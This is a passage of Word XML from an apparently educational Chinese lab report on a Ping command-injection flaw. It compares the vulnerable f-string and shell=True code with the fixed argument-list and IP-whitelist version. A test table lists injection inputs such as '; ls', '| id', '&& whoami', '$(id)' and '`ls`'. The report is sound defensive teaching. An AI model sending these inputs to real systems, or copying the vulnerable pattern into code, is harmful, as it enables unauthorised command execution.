        <w:t xml:space="preserve">        return False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color w:val="27AE60"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>修复 4：错误信息脱敏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不再直接回显原始异常信息（如 str(e) 包含系统路径），统一替换为脱敏提示信息如「Ping 请求失败（目标不可达）」，防止信息泄露。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七、修复汇总与安全对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC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fill="B03A2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安全维度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:shd w:fill="B03A2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修复前</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:shd w:fill="B03A2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修复后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命令构建方式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f-string 拼接: f'ping -c 3 {ip}'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参数列表: ['ping', '-c', '3', ip]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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shell 解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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shell=True（启用 shell）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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shell=False（默认，禁用 shell）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IP 输入校验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无校验，直接拼接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ipaddress.ip_address() 白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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shell 字符拦截</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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无过滤，; | &amp; 均可</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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正则拦截所有 shell 元字符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IPv6 支持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不支持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标准 IPv6 地址可正常 ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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域名/主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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接受任意输入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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仅接受标准 IP，域名拒绝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错误信息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str(e) 暴露系统路径</w:t>
            </w:r>
          </w:p>
        </w:tc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统一脱敏提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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回显内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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原始命令输出完整回显</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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去除冗余路径信息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八、修复后安全验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC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fill="B03A2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测试用例</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
            <w:shd w:fill="B03A2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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
            <w:shd w:fill="B03A2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实际结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="850"/>
            <w:shd w:fill="B03A2E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正常 ping 127.0.0.1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ping 正常执行，返回结果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返回 ping 统计信息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</w:tr>
      <w:tr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正常 ping 8.8.8.8</w:t>
            </w:r>
          </w:p>
        </w:tc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ping 正常执行</w:t>
            </w:r>
          </w:p>
        </w:tc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正常返回</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="850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IPv6 ::1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ping 正常执行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正常返回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</w:tr>
      <w:tr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分号注入 ; ls</w:t>
            </w:r>
          </w:p>
        </w:tc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拦截，不执行</w:t>
            </w:r>
          </w:p>
        </w:tc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IP 地址格式不合法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="850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管道符注入 | id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拦截，不执行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IP 地址格式不合法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</w:tr>
      <w:tr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命令替换 &amp;&amp; whoami</w:t>
            </w:r>
          </w:p>
        </w:tc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拦截，不执行</w:t>
            </w:r>
          </w:p>
        </w:tc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IP 地址格式不合法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="850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命令替换 \$(id)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拦截，不执行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IP 地址格式不合法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</w:tr>
      <w:tr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反引号注入 `ls`</w:t>
            </w:r>
          </w:p>
        </w:tc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拦截，不执行</w:t>
            </w:r>
          </w:p>
        </w:tc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IP 地址格式不合法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="850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域名 example.com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拦截，拒绝执行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IP 地址格式不合法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</w:tr>
      <w:tr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空输入</w:t>
            </w:r>
          </w:p>
        </w:tc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拦截，提示输入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984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请输入 IP 地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="850"/>
            <w:shd w:fill="F2F2F2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错误信息含系统路径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不存在系统路径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无路径泄露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</w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="160" w:line="400" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>验证结论：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全部 5 种命令注入方式已成功修复。正常 ping 功能完全保留，所有攻击 Payload 全部被拦截。修复后系统满足以下安全要求：</w:t>
        <w:br/>
        <w:t>（1）无 f-string 拼接命令，改用参数列表执行；</w:t>
        <w:br/>
        <w:t>（2）无 shell=True，禁止 shell 解析；</w:t>
        <w:br/>
        <w:t>（3）IP 白名单校验严格限制输入格式；</w:t>
        <w:br/>
        <w:t>（4）shell 特殊字符全都被拦截；</w:t>
        <w:br/>
        <w:t>（5）错误信息脱敏，不泄露系统路径。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九、实验总结与心得</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pP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通过本次 Ping 命令注入漏洞复现与修复实验，深入理解了 OS 命令注入漏洞的产生原理、多种利用手法及其对应的修复方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="400" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>核心认知：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（1）操作系统命令注入是最严重的 Web 漏洞之一（CWE-78），因为它允许攻击者在服务器上执行任意系统命令。其本质是用户输入被当作操作系统命令的一部分来解释执行。修复的核心在于永远不让用户输入参与命令结构的构建。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（2）shell=True 的危害被严重低估。Python 官方文档明确指出：shell=True 可能带来安全风险。开启 shell=True 后，命令字符串会经过 /bin/sh 解析，; | &amp; \$() ` 等字符都变成shell 语法的一部分。绝大多数场景下 shell=True 都不是必需的。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（3）参数列表方式（['ping', '-c', '3', ip]）是最安全的命令执行方式。每个参数独立传递，不经过 shell 解析，即使参数包含特殊字符也仅作为字符串文本传递给目标程序，不会被解释为命令分隔符。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（4）白名单校验优于黑名单过滤。IP 地址有严格的标准格式（IPv4 为 4 段 0-255 数字），完全可以通过 ipaddress.ip_address() 进行精确校验。白名单方式天然拒绝所有非法格式，不存在绕过风险。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>通过本次实验深刻认识到：任何涉及系统命令执行的功能都必须遵循「默认拒绝、白名单校验、参数列表执行」的安全原则，三者缺一不可。shell=True + 字符串拼接在任何场景下都不应该被使用。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="969696"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>报告完</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="B4B4B4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>本报告仅供安全教学与技术交流使用。报告中涉及的漏洞代码已全部修复，</w:t>
        <w:br/>
        <w:t>请勿将存在漏洞的代码版本部署到任何生产环境。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